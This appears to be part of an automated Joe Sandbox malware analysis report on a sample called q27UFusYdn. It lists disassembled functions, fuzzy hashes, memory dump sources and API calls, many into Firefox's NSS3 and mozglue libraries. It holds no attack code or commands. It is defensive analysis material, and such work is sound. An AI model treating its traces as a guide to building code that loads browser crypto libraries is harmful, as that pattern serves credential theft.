Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID:
String ID: winUnlock$winUnlockReadLock$5s/
API String ID: 0-3380655168
Opcode ID: 825a066c963d2d593a5ff34eb1cf92167a80665fd6944b12298f30e345cfe19f
Instruction ID: d31fb1d2cd959555be64529cbbb8b98f053719de1b272881c3fe44d175aa709f
Opcode Fuzzy Hash: 825a066c963d2d593a5ff34eb1cf92167a80665fd6944b12298f30e345cfe19f
Instruction Fuzzy Hash: B2718E71A18200ABDB44CF29D884BABBBF5FF89314F14C619F99997211D730A986CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE3F019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6CE3F0F9

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: 78389be628b64cecbeb9497cb9e4b62f953a1caa9a16fc114356342376d6880f
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: 6E91B075A0062A8BCB14CF68C8916AEB7F1FF85324F24472DD966A7BC0D738A905CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6CE62F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6CE87929), ref: 6CE62FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6CE87929), ref: 6CE62FE0

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: f5c9f10f7ad3a6ab6eb3fe69e595c611ddc817b27d2fb25370391f5d02ab2122
Instruction ID: 3137710df0b5f093b8f1c4a1f1d97c50b9a4e0f23a7b29f0a5695f478a73780b
Opcode Fuzzy Hash: f5c9f10f7ad3a6ab6eb3fe69e595c611ddc817b27d2fb25370391f5d02ab2122
Instruction Fuzzy Hash: 8B510671AA49118FD750CE57C880B6A73B1FF4531CF354129D989ABF02C736E94ACB81

Uniqueness

Uniqueness Score: -1.00%

Function 6CDA4DB0 Relevance: 2.8, Strings: 2, Instructions: 318COMMON

Download Yara Rule

Strings

5s/, xrefs: 6CDA4DC2
winUnlockReadLock, xrefs: 6CDA5125

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID:
String ID: winUnlockReadLock$5s/
API String ID: 0-2504907731
Opcode ID: 0166e5893bf22bad0c0ef18f6df3eeda4f480a17fcff43bcd5a80081e39136e4
Instruction ID: f9cd371761e02f334932b1c42ba36a65d2a465bf1475d87a918741a0bfb1c4d1
Opcode Fuzzy Hash: 0166e5893bf22bad0c0ef18f6df3eeda4f480a17fcff43bcd5a80081e39136e4
Instruction Fuzzy Hash: 22E14C71A28340CFDB45DF29D88876ABBF0FF89304F11961DE89997261E7309985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE6ED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6CE6EE3D

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 54670e6f59565c1a6f03b9a53b723a550fb079cb0b9e25744bb9cb989756439a
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: 9A71E272E61B018FD718CF5AC88176ABBF2AB98318F24462DD85697BD1D730E901CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00419DC7 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00019D85), ref: 00419DCC

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 070a293f5fd72a4302476959d8ba9f25930c1a77546e2223ef40415f4a224816
Instruction ID: a2f7eb20247afb77339b0084df5ee2fab041c51b9664aeb6610f0aa757957e44
Opcode Fuzzy Hash: 070a293f5fd72a4302476959d8ba9f25930c1a77546e2223ef40415f4a224816
Instruction Fuzzy Hash: 0290027069124446460057B06C1D6966A95AA8C60679144E5E125C405DEB644448555D

Uniqueness

Uniqueness Score: -1.00%

Function 6CE544C0 Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

5s/, xrefs: 6CE544CF

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID:
String ID: 5s/
API String ID: 0-340167759
Opcode ID: 179c3c9c3b0dfd20604d57b981a6c3670315fbc28c10dc383b9d5c1272ce72e3
Instruction ID: ab48297d7793f83d3b224cfdb66533682455cc2670e4d333b989bcdeb177ea42
Opcode Fuzzy Hash: 179c3c9c3b0dfd20604d57b981a6c3670315fbc28c10dc383b9d5c1272ce72e3
Instruction Fuzzy Hash: 9F110976E002199F8B00CF99D8809EFBBF9EF8C664B55442AED18E7300D231ED118BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE54440 Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

5s/, xrefs: 6CE54452

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID:
String ID: 5s/
API String ID: 0-340167759
Opcode ID: 1376a6f2ccc944ee565cc9b617f74f1eae3730804d2aa340f3f965ace2141e34
Instruction ID: 7dda520f60c410671d4327a790c8f70ddf4f178c6ca843e2ec9c580760019a37
Opcode Fuzzy Hash: 1376a6f2ccc944ee565cc9b617f74f1eae3730804d2aa340f3f965ace2141e34
Instruction Fuzzy Hash: 7D11C576A002199F9B00DF59C8809EFBBF9EF4C214B56416AED18E7301E631ED118BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE08EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f5e3f705d73a1bee6e5223c1a5d41bc40af4c0d7265cfa09e16edc25efa83a
Instruction ID: 21a6b093c0c552a84ceccd4fc5a334b6117788137d9f4572f2abdc742bcc13f0
Opcode Fuzzy Hash: 38f5e3f705d73a1bee6e5223c1a5d41bc40af4c0d7265cfa09e16edc25efa83a
Instruction Fuzzy Hash: 7111EF32B002199BD728DF25D88475AB7B5BF4231CF24426AD8158FB52C775E8A2CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6CEE0C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d660bda361772d74f6bbb88c0e30fefdc1e7385682013df477267ca3eb9a015
Instruction ID: cfca1afb5a376449fc40cfb3dc6efd6267ce4959d5c667b8f563c74fad421b69
Opcode Fuzzy Hash: 1d660bda361772d74f6bbb88c0e30fefdc1e7385682013df477267ca3eb9a015
Instruction Fuzzy Hash: 5E1191797043459FDB00DF29D88066A77B5FF893A8F24806DD8198B751DB71E806CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CEE0D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 0f0bd454d213ab9771831885a22eba5c6179aa318a44cd25b8af776d6bbc93f2
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: DAE06D3A202054A7DB148E09C450AA97379DF8A659FF4807DCC599BA01DA73F8039791

Uniqueness

Uniqueness Score: -1.00%

Function 00415DC0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Uniqueness

Uniqueness Score: -1.00%

Function 0041952A Relevance: 129.2, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041953E

Part of subcall function 00417247: HeapFree.KERNEL32(00000000,00000000,?,00417158,00000000,00421AC0,0041719F,?,?,?,0041720F,00421AC0,?,?,00419FD3,00421AC0), ref: 0041725D
Part of subcall function 00417247: GetLastError.KERNEL32(?,?,00417158,00000000,00421AC0,0041719F,?,?,?,0041720F,00421AC0,?,?,00419FD3,00421AC0), ref: 0041726F

_free.LIBCMT ref: 00419546
_free.LIBCMT ref: 0041954E
_free.LIBCMT ref: 00419556
_free.LIBCMT ref: 0041955E
_free.LIBCMT ref: 00419566
_free.LIBCMT ref: 0041956D
_free.LIBCMT ref: 00419575
_free.LIBCMT ref: 0041957D
_free.LIBCMT ref: 00419585
_free.LIBCMT ref: 0041958D
_free.LIBCMT ref: 00419595
_free.LIBCMT ref: 0041959D
_free.LIBCMT ref: 004195A5
_free.LIBCMT ref: 004195AD
_free.LIBCMT ref: 004195B5
_free.LIBCMT ref: 004195C0
_free.LIBCMT ref: 004195C8
_free.LIBCMT ref: 004195D0
_free.LIBCMT ref: 004195D8
_free.LIBCMT ref: 004195E0
_free.LIBCMT ref: 004195E8
_free.LIBCMT ref: 004195F0
_free.LIBCMT ref: 004195F8
_free.LIBCMT ref: 00419600
_free.LIBCMT ref: 00419608
_free.LIBCMT ref: 00419610
_free.LIBCMT ref: 00419618
_free.LIBCMT ref: 00419620
_free.LIBCMT ref: 00419628
_free.LIBCMT ref: 00419630
_free.LIBCMT ref: 00419638
_free.LIBCMT ref: 00419646
_free.LIBCMT ref: 00419651
_free.LIBCMT ref: 0041965C
_free.LIBCMT ref: 00419667
_free.LIBCMT ref: 00419672
_free.LIBCMT ref: 0041967D
_free.LIBCMT ref: 00419688
_free.LIBCMT ref: 00419693
_free.LIBCMT ref: 0041969E
_free.LIBCMT ref: 004196A9
_free.LIBCMT ref: 004196B4
_free.LIBCMT ref: 004196BF
_free.LIBCMT ref: 004196CA
_free.LIBCMT ref: 004196D5
_free.LIBCMT ref: 004196E0
_free.LIBCMT ref: 004196EB
_free.LIBCMT ref: 004196F9
_free.LIBCMT ref: 00419704
_free.LIBCMT ref: 0041970F
_free.LIBCMT ref: 0041971A
_free.LIBCMT ref: 00419725
_free.LIBCMT ref: 00419730
_free.LIBCMT ref: 0041973B
_free.LIBCMT ref: 00419746
_free.LIBCMT ref: 00419751
_free.LIBCMT ref: 0041975C
_free.LIBCMT ref: 00419767
_free.LIBCMT ref: 00419772
_free.LIBCMT ref: 0041977D
_free.LIBCMT ref: 00419788
_free.LIBCMT ref: 00419793
_free.LIBCMT ref: 0041979E
_free.LIBCMT ref: 004197AC
_free.LIBCMT ref: 004197B7
_free.LIBCMT ref: 004197C2
_free.LIBCMT ref: 004197CD
_free.LIBCMT ref: 004197D8
_free.LIBCMT ref: 004197E3
_free.LIBCMT ref: 004197EE
_free.LIBCMT ref: 004197F9
_free.LIBCMT ref: 00419804
_free.LIBCMT ref: 0041980F
_free.LIBCMT ref: 0041981A
_free.LIBCMT ref: 00419825
_free.LIBCMT ref: 00419830
_free.LIBCMT ref: 0041983B
_free.LIBCMT ref: 00419846
_free.LIBCMT ref: 00419851
_free.LIBCMT ref: 0041985F
_free.LIBCMT ref: 0041986A
_free.LIBCMT ref: 00419875
_free.LIBCMT ref: 00419880
_free.LIBCMT ref: 0041988B
_free.LIBCMT ref: 00419896

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction ID: 5df7b21d12798ad2dd02b2714939a7e9e3589bb161cd2ca89e36415dbd51ea28
Opcode Fuzzy Hash: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction Fuzzy Hash: AE71E331494B009BD7633B32DD03ADA7AB27F04304F10596EB1FB20632DA3678E79A59

Uniqueness

Uniqueness Score: -1.00%

Function 6CEE6E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CD9CA30: EnterCriticalSection.KERNEL32(?,?,?,6CDFF9C9,?,6CDFF4DA,6CDFF9C9,?,?,6CDC369A), ref: 6CD9CA7A
Part of subcall function 6CD9CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CD9CB26

memset.VCRUNTIME140(00000000,00000000,?,?,6CDABE66), ref: 6CEE6E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6CDABE66), ref: 6CEE6E98
sqlite3_snprintf.NSS3(?,00000000,6CF4AAF9,?,?,?,?,?,?,6CDABE66), ref: 6CEE6EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6CDABE66), ref: 6CEE6ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6CDABE66), ref: 6CEE6EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6CDABE66), ref: 6CEE6F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6CDABE66), ref: 6CEE6F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6CDABE66), ref: 6CEE6F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6CDABE66), ref: 6CEE6FA6
sqlite3_snprintf.NSS3(?,00000000,6CF4AAF9,00000000,?,?,?,?,?,?,?,6CDABE66), ref: 6CEE6FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6CDABE66), ref: 6CEE6FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CDABE66), ref: 6CEE6FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CDABE66), ref: 6CEE7014
sqlite3_free.NSS3(00000000,?,?,?,?,6CDABE66), ref: 6CEE701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6CDABE66), ref: 6CEE7030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6CDABE66), ref: 6CEE705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6CDABE66), ref: 6CEE7079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CDABE66), ref: 6CEE7097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6CDABE66), ref: 6CEE70A0

Strings

winGetTempname1, xrefs: 6CEE708F
winGetTempname5, xrefs: 6CEE7071
mz_etilqs_, xrefs: 6CEE6F18
winGetTempname2, xrefs: 6CEE70C4
winGetTempname4, xrefs: 6CEE7046

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: 3b557bb56c5cba99f5886714bad856fa20da363a67de3ffeed64438e5089da5a
Instruction ID: 6b263d1160186e93a2f50d3e79f3a274e64fa0cfd2412f6a9118864fafbc6b7a
Opcode Fuzzy Hash: 3b557bb56c5cba99f5886714bad856fa20da363a67de3ffeed64438e5089da5a
Instruction Fuzzy Hash: F0519B71F101102BE31097709C55BBB367A9F9638CF344538E91597BD2FB26991EC2E2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE74FE0 Relevance: 42.2, APIs: 18, Strings: 6, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE275C2,00000000,00000000,00000001), ref: 6CE75009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE275C2,00000000), ref: 6CE75049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE7505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6CE75071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE75089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE750A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CE750B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE275C2), ref: 6CE750CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE750D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE750F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE75103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE7511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE7512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE75145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE75153
free.MOZGLUE(?), ref: 6CE7516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CE7517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE75195

Strings

nss=, xrefs: 6CE75083
config=, xrefs: 6CE7509B
parameters=, xrefs: 6CE7506B
5s/, xrefs: 6CE74FE9
name=, xrefs: 6CE75057
library=, xrefs: 6CE75043

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
